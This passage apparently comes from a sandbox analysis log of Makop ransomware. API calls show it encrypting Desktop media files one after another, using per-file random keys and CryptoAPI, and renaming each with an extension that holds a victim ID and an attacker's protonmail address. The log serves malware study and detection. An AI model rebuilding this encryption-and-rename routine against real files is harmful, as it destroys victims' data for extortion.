ftLastAccessTime.dwLowDateTime=0xa2e5a5f0, ftLastAccessTime.dwHighDateTime=0x1d5e5dd, ftLastWriteTime.dwLowDateTime=0xa2e5a5f0, ftLastWriteTime.dwHighDateTime=0x1d5e5dd, nFileSizeHigh=0x0, nFileSizeLow=0x19a9, dwReserved0=0x0, dwReserved1=0xffff, cFileName="LMnfTCLsYafahCr4Z a9.mp3", cAlternateFileName="LMNFTC~1.MP3")) returned 1 [0128.293] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LMnfTCLsYafahCr4Z a9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lmnftclsyafahcr4z a9.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.293] GetProcessHeap () returned 0x550000 [0128.293] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.293] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.293] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.293] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x7, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x7, lpOverlapped=0x0) returned 1 [0128.294] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.294] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.294] GetProcessHeap () returned 0x550000 [0128.294] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x50) returned 0x56d278 [0128.294] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50, dwBufLen=0x50 | out: pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50) returned 1 [0128.295] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.295] WriteFile (in: hFile=0xac, lpBuffer=0x56d278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56d278*, lpNumberOfBytesWritten=0x245fc90*=0x50, lpOverlapped=0x0) returned 1 [0128.295] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.295] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.295] WriteFile (in: hFile=0xac, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.295] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.295] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.295] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.295] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.295] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.295] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x19a9, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x19a9, lpOverlapped=0x0) returned 1 [0128.296] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x19b0, dwBufLen=0x19b0 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x19b0) returned 1 [0128.296] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.296] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x19b0, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x19b0, lpOverlapped=0x0) returned 1 [0128.296] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.296] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x1a94, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.296] SetEndOfFile (hFile=0xac) returned 1 [0128.300] GetProcessHeap () returned 0x550000 [0128.300] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56d278 | out: hHeap=0x550000) returned 1 [0128.300] GetProcessHeap () returned 0x550000 [0128.300] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.300] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LMnfTCLsYafahCr4Z a9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lmnftclsyafahcr4z a9.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LMnfTCLsYafahCr4Z a9.mp3.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lmnftclsyafahcr4z a9.mp3.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.309] CloseHandle (hObject=0xac) returned 1 [0128.309] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5f88e80, ftCreationTime.dwHighDateTime=0x1d5de18, ftLastAccessTime.dwLowDateTime=0x644b1790, ftLastAccessTime.dwHighDateTime=0x1d5e3bb, ftLastWriteTime.dwLowDateTime=0x644b1790, ftLastWriteTime.dwHighDateTime=0x1d5e3bb, nFileSizeHigh=0x0, nFileSizeLow=0xe89c, dwReserved0=0x0, dwReserved1=0xffff, cFileName="ltUpP0VYQujIjQ1Cv-C.avi", cAlternateFileName="LTUPP0~1.AVI")) returned 1 [0128.309] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ltUpP0VYQujIjQ1Cv-C.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ltupp0vyqujijq1cv-c.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.310] GetProcessHeap () returned 0x550000 [0128.310] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.310] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.310] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.310] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.311] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.311] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.311] GetProcessHeap () returned 0x550000 [0128.311] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x50) returned 0x56d278 [0128.311] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50, dwBufLen=0x50 | out: pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50) returned 1 [0128.311] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.311] WriteFile (in: hFile=0xac, lpBuffer=0x56d278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56d278*, lpNumberOfBytesWritten=0x245fc90*=0x50, lpOverlapped=0x0) returned 1 [0128.312] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.312] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.312] WriteFile (in: hFile=0xac, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.312] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.312] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.312] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.312] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.312] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.313] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0xe89c, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0xe89c, lpOverlapped=0x0) returned 1 [0128.313] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0xe8a0, dwBufLen=0xe8a0 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0xe8a0) returned 1 [0128.314] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.314] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0xe8a0, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0xe8a0, lpOverlapped=0x0) returned 1 [0128.315] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.315] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xe984, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.315] SetEndOfFile (hFile=0xac) returned 1 [0128.358] GetProcessHeap () returned 0x550000 [0128.358] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56d278 | out: hHeap=0x550000) returned 1 [0128.358] GetProcessHeap () returned 0x550000 [0128.358] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.358] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ltUpP0VYQujIjQ1Cv-C.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ltupp0vyqujijq1cv-c.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ltUpP0VYQujIjQ1Cv-C.avi.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ltupp0vyqujijq1cv-c.avi.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.370] CloseHandle (hObject=0xac) returned 1 [0128.370] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c7fae50, ftCreationTime.dwHighDateTime=0x1d5dc02, ftLastAccessTime.dwLowDateTime=0xeaadca10, ftLastAccessTime.dwHighDateTime=0x1d5e093, ftLastWriteTime.dwLowDateTime=0xeaadca10, ftLastWriteTime.dwHighDateTime=0x1d5e093, nFileSizeHigh=0x0, nFileSizeLow=0x1009d, dwReserved0=0x0, dwReserved1=0xffff, cFileName="LzCv0qd.gif", cAlternateFileName="")) returned 1 [0128.370] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LzCv0qd.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lzcv0qd.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.371] GetProcessHeap () returned 0x550000 [0128.371] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.371] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.371] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.371] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x3, lpOverlapped=0x0) returned 1 [0128.373] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.373] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.373] GetProcessHeap () returned 0x550000 [0128.373] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0128.373] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40) returned 1 [0128.373] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.373] WriteFile (in: hFile=0xac, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fc90*=0x40, lpOverlapped=0x0) returned 1 [0128.373] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.373] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.374] WriteFile (in: hFile=0xac, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.374] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.374] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.374] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.374] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.374] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.374] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x1009d, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x1009d, lpOverlapped=0x0) returned 1 [0128.375] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x100a0, dwBufLen=0x100a0 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x100a0) returned 1 [0128.376] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.376] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x100a0, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x100a0, lpOverlapped=0x0) returned 1 [0128.376] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.376] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x10174, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.376] SetEndOfFile (hFile=0xac) returned 1 [0128.380] GetProcessHeap () returned 0x550000 [0128.380] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0128.380] GetProcessHeap () returned 0x550000 [0128.380] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.380] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LzCv0qd.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lzcv0qd.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LzCv0qd.gif.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lzcv0qd.gif.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.390] CloseHandle (hObject=0xac) returned 1 [0128.390] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7aa47610, ftCreationTime.dwHighDateTime=0x1d5dab2, ftLastAccessTime.dwLowDateTime=0xbf5ec460, ftLastAccessTime.dwHighDateTime=0x1d5e0e1, ftLastWriteTime.dwLowDateTime=0xbf5ec460, ftLastWriteTime.dwHighDateTime=0x1d5e0e1, nFileSizeHigh=0x0, nFileSizeLow=0x12913, dwReserved0=0x0, dwReserved1=0xffff, cFileName="OPH-kzb_k7gLmw.mp3", cAlternateFileName="OPH-KZ~1.MP3")) returned 1 [0128.390] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OPH-kzb_k7gLmw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oph-kzb_k7glmw.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.390] GetProcessHeap () returned 0x550000 [0128.390] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.390] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.390] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.390] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0xd, lpOverlapped=0x0) returned 1 [0128.392] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.392] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.392] GetProcessHeap () returned 0x550000 [0128.392] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0128.392] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40) returned 1 [0128.392] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.392] WriteFile (in: hFile=0xac, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fc90*=0x40, lpOverlapped=0x0) returned 1 [0128.392] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.392] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.392] WriteFile (in: hFile=0xac, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.392] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.392] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.392] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.392] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.393] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.393] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x12913, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x12913, lpOverlapped=0x0) returned 1 [0128.393] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x12920, dwBufLen=0x12920 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x12920) returned 1 [0128.394] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.394] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x12920, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x12920, lpOverlapped=0x0) returned 1 [0128.395] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.395] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x129f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.395] SetEndOfFile (hFile=0xac) returned 1 [0128.398] GetProcessHeap () returned 0x550000 [0128.398] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0128.399] GetProcessHeap () returned 0x550000 [0128.399] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.399] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OPH-kzb_k7gLmw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oph-kzb_k7glmw.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OPH-kzb_k7gLmw.mp3.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oph-kzb_k7glmw.mp3.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.405] CloseHandle (hObject=0xac) returned 1 [0128.405] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x707619b0, ftCreationTime.dwHighDateTime=0x1d5e722, ftLastAccessTime.dwLowDateTime=0xb6aa76f0, ftLastAccessTime.dwHighDateTime=0x1d5e363, ftLastWriteTime.dwLowDateTime=0xb6aa76f0, ftLastWriteTime.dwHighDateTime=0x1d5e363, nFileSizeHigh=0x0, nFileSizeLow=0x186f4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="ps5_I.wav", cAlternateFileName="")) returned 1 [0128.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ps5_I.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ps5_i.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.406] GetProcessHeap () returned 0x550000 [0128.406] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.406] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.406] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: 